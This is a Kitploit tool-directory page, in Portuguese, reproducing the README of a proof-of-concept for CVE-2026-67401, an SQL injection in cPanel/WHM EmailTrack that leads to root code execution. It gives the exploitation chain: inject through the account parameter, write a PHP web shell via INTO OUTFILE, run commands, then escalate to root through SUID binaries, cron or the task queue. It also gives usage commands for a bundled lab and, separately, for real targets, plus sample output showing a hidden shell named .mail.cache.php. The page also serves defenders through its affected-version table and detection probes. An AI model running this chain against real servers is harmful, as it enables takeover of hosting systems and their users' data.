Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-67401 — Prova de conceito para CVE-2026-67401, uma injeção SQL no EmailTrack do cPanel/WHM que permite escrita arbitrária de arquivos e RCE como root, com sondas de detecção de SQLi e um laboratório vulnerável autocontido. | Kitploit
Ferramentas/GitHubGitHub/imbas007/cve-2026-67401
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubimbas007/cve-2026-67401

CVE-2026-67401

Prova de conceito para CVE-2026-67401, uma injeção SQL no EmailTrack do cPanel/WHM que permite escrita arbitrária de arquivos e RCE como root, com sondas de detecção de SQLi e um laboratório vulnerável autocontido.

5326há 20 diasAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-67401 — Injeção SQL no EmailTrack do cPanel/WHM → RCE como root

CVE Severity Platform Python

Prova de conceito para CVE-2026-67401, uma vulnerabilidade crítica de injeção SQL na funcionalidade EmailTrack do cPanel & WHM que permite a um usuário autenticado com privilégios relacionados a e-mail gravar arquivos arbitrários e executar código como root.

Descoberto por: Ali Mustafa Divulgado em: 8 de setembro de 2026 Componente: EmailTrack (registro / rastreamento de entrega de e-mail)


Versões Afetadas

As versões abaixo das compilações corrigidas são vulneráveis.

Série de Compilação do cPanelVersão Corrigida
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

Verifique sua versão com:

cat /usr/local/cpanel/version

Cadeia de Exploração

┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. Autenticar no cPanel com uma conta que possua privilégios de e-mail.
  2. Injetar através do parâmetro account do EmailTrack.
  3. Gravar um web shell PHP com SELECT ... INTO OUTFILE em public_html/.
  4. Executar comandos através do shell.
  5. Escalar privilégios via binários SUID do cPanel, cron ou fila de tarefas.

Conteúdo do Repositório

ArquivoDescrição
poc_sqli.pyDetecção de injeção SQL: baseada em booleano, baseada em tempo e contagem de colunas UNION
poc_full_chain.pyCadeia completa de exploração: SQLi → web shell via INTO OUTFILE → RCE → orientações para root
lab/vuln_server.pySimulação local do backend vulnerável do EmailTrack (seguro, autocontido)
README.mdEste documento

O laboratório incluído permite executar e validar toda a cadeia sem um servidor cPanel real.


Requisitos

  • Python 3.8+
  • Nenhum pacote de terceiros — tudo usa a biblioteca padrão.

Uso

Todos os comandos são executados a partir da raiz do repositório.

1. Executar o laboratório local

python3 lab/vuln_server.py 18123 lab/htdocs
  • Credenciais: alice / s3cr1t
  • Emula: login UAPI, a consulta vulnerável do EmailTrack, SLEEP(), INTO OUTFILE e execução de web shell PHP.
  • Argumento 1: porta (padrão 18123)
  • Argumento 2: raiz de documentos (padrão lab/htdocs)

Deixe isso em execução em um terminal e use um segundo terminal para os PoCs.

2. Detecção de injeção SQL

python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
ArgumentoDescrição
-H, --hostHost do cPanel, ex.: https://cp.example.com:2083
-u, --usernameConta do cPanel com privilégios de e-mail
-p, --passwordSenha da conta
--paramParâmetro injetável (padrão: account)
--modedetect (padrão), boolean, timing, union ou all
--sleepDuração do SLEEP() para a sonda de tempo (padrão: 3.0)
--dump-versionTenta extrair a versão do SGBD via UNION
--insecureIgnora a verificação de certificado TLS

Executar uma sonda específica:

# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. Cadeia completa de exploração

CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
Argumento / EnvDescrição
host (posicional)Host do cPanel, ou defina a env CPANEL_HOST
CPANEL_USERConta do cPanel com privilégios de e-mail
CPANEL_PASSSenha da conta
--shell-baseURL base que serve public_html (onde o web shell é acessado)
--insecureIgnora a verificação de certificado TLS
--no-escalatePara após o RCE; ignora as orientações de escalação para root
SHELL_NAME (env)Nome do arquivo do web shell (padrão: .mail.cache.php)

Etapas executadas automaticamente:

  1. Autenticar no cPanel
  2. Confirmar a injeção SQL (booleana + baseada em tempo)
  3. Determinar a contagem de colunas da consulta via UNION
  4. Gravar um web shell PHP com SELECT ... INTO OUTFILE
  5. Executar comandos através do shell (id, whoami, enumeração de SUID, …)
  6. Imprimir orientações de escalação para root (SUID whmapi1, cron, fila de tarefas)

4. Contra um alvo real

# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

Nota: o --shell-base padrão remove a porta exclusiva do cPanel (2082/2083) do host. Se a raiz de documentos for servida em uma porta diferente, defina-a explicitamente.


Resultados Verificados

Saída produzida contra o laboratório incluído:

  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

Referências

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

Licença

Lançado para fins educacionais e de pesquisa de segurança autorizada. Consulte o Aviso Legal antes do uso.

Baixar ferramenta